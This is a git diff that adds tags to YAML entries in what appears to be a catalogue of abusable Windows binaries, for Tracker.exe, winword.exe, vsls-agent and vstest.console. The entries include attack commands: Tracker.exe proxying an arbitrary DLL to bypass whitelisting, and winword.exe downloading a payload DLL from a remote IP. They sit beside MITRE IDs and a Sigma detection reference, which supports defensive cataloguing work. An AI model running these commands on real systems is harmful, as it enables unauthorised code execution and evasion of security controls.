Format Full_Path: - Path: no default Detection: diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index 90029d4..abaddfd 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: DLL - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: DLL Full_Path: - Path: no default Code_Sample: diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index c1697df..dddff5e 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml @@ -6,11 +6,13 @@ Created: 2019-07-19 Commands: - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" Description: Downloads payload from remote server - Usecase: It will download a remote payload and place it in the cache folder + Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows + Tags: + - Download: INetCache Full_Path: - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe @@ -28,8 +30,6 @@ Full_Path: - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe - Path: C:\Program Files\Microsoft Office\Office12\winword.exe - Path: C:\Program Files\Microsoft Office\Office12\winword.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml - IOC: Suspicious Office application Internet/network traffic diff --git a/yml/OtherMSBinaries/vsls-agent.yml b/yml/OtherMSBinaries/vsls-agent.yml index b5f4b7f..817ef21 100644 --- a/yml/OtherMSBinaries/vsls-agent.yml +++ b/yml/OtherMSBinaries/vsls-agent.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed) + Tags: + - Execute: DLL Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe Detection: diff --git a/yml/OtherMSBinaries/vstest.console.yml b/yml/OtherMSBinaries/vstest.console.yml index aa950be..c476fec 100644 --- a/yml/OtherMSBinaries/vstest.console.yml +++ b/yml/OtherMSBinaries/vstest.console.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe